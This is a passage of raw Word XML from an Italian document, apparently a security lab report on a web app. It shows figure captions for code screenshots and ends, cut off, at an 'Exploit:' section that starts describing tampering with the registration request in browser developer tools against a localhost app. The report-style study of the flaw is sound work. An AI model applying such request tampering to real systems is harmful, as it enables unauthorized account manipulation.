                <wp:positionH relativeFrom="column">
                  <wp:posOffset>742950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1485900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4634865" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1328532979" name="Casella di testo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543B8FE1" w14:textId="3F252250"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34</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: AccountUser.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386" id="_x0000_s1061" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:58.5pt;margin-top:117pt;width:364.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="543B8FE1" w14:textId="3F252250" w:rsidR="0076032B" w:rsidRPr="00FC4D3E" w:rsidRDefault="0076032B" w:rsidP="0076032B">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>34</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: AccountUser.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251823104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77E65191" wp14:editId="66BE37EA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>175895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4634865" cy="1252855"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="1979728500" name="Immagine 10"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8500" name="Immagine 10" descr="Immagine che contiene testo, schermata, Carattere, scherm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4865" cy="1252855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C830EAC" w14:textId="7E4761D4" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA3CBDB" w14:textId="1BE9344B" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E7B8B8" w14:textId="6FAC4E72" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AEB5E0" w14:textId="4813178E" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54277788" w14:textId="52B947F0" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C45263" w14:textId="531E40A5" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8E9B38" w14:textId="7777E736" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389CDECD" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D4C753" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168FA1CF" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A259B0C" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFFC929" w14:textId="7C4340EE" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8D2585" w14:textId="18A58473" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251827200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20D6F7B6" wp14:editId="175E693F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1555115</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3305810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3009265" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1251662134" name="Casella di testo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F1A2CBF" w14:textId="17375B15"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5</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: SignUp.j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F7B6" id="_x0000_s1062" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:122.45pt;margin-top:260.3pt;width:23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BRGwIAAEA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fImzz/N5recSfLNb25j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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7F1A2CBF" w14:textId="17375B15" w:rsidR="0076032B" w:rsidRPr="005A592A"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5</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: SignUp.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="291D957C" wp14:editId="623ED4BF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-538480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3009608" cy="3787428"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="5768816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608" cy="3787428"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D1452" w14:textId="24614B48" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A59858D" w14:textId="49F71B28" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F65816" w14:textId="0E2ED32C" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A678E88" w14:textId="3EEE9EF6" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D3294C" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1564317C" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C72EDF2" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B335D07" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276EC99D" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135F8710" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B12B2C" w14:textId="4E2A88D6" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D75A23" w14:textId="78BD83C5" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B155D16" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500E8909" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CA0B4A" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609B0E19" w14:textId="0B3597A7" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30EEAAF4" w14:textId="4B8891BE" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4372A1DC" w14:textId="12737486" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00071E32">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1214897D" wp14:editId="7249E6AF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5539740" cy="4465320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15734855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740" cy="4465320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D815732" w14:textId="278E2022" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7EAC15" w14:textId="10307D56" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B674EAF" w14:textId="333D1690" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E64A63" w14:textId="0B710D41" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F787ED" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADC421D" w14:textId="43ACFC95" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B47F7A" w14:textId="494D483B" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51EE7049" w14:textId="56EB2EA5" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6101E6" w14:textId="1E3A828D" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDA2333" w14:textId="2EF43874" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208080D2" w14:textId="009DE33F" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE7A490" w14:textId="57973434" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42223A49" w14:textId="2A818C64" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A5D8FF" w14:textId="22828C5B" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78558FA5" w14:textId="043BFD01" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6814D6E8" w14:textId="3138ADCE" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5647C817" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50EFE377" w14:textId="4FA27A0F" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABCE892" w14:textId="0DAB84EF" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188CEB3F" w14:textId="72C2BB5B" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610E938A" w14:textId="6EF54A83" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251829248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E715933" wp14:editId="5338636C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5614035" cy="635"/>
                <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="515598281"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A2E3FF3" w14:textId="4B672780"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6</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5933" id="_x0000_s1063" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.8pt;width:442.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eT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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0A2E3FF3" w14:textId="4B672780" w:rsidR="0076032B" w:rsidRPr="00AB5E89"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6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDF0EA3" w14:textId="4211AFF2" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECF1A7C" w14:textId="37DB310B" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D67AE61" w14:textId="29EF4380" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251831296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5AFD5991" wp14:editId="1A8A5E64">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>250190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1320165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5614035" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="737543427" name="Casella di testo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B90EBA6" w14:textId="5D98BD3D"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7</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: User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5991" id="_x0000_s1064" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:19.7pt;margin-top:103.95pt;width:442.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yaGw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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3B90EBA6" w14:textId="5D98BD3D" w:rsidR="0076032B" w:rsidRPr="003E26F4"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7</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AD2CCCF" wp14:editId="4A7CDE2C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-506095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5614035" cy="1769110"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="12025334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1769110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1C434" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF50608" w14:textId="04CB28A1" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B26155E" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A7D35B" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA8A3EB" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31792734" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222F289C" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2762B4E1" w14:textId="5FD43981" w:rsidR="0026401D" w:rsidRPr="0026401D" w:rsidRDefault="0026401D" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026401D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E05ABDE" w14:textId="10A5D052" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="0076032B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aprendo il Web developer tool del browser si può modificare la richiesta inviata quando ci si è registrati (URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="0076032B">
        <w:t>http://localhost:4200/account-user</w:t>
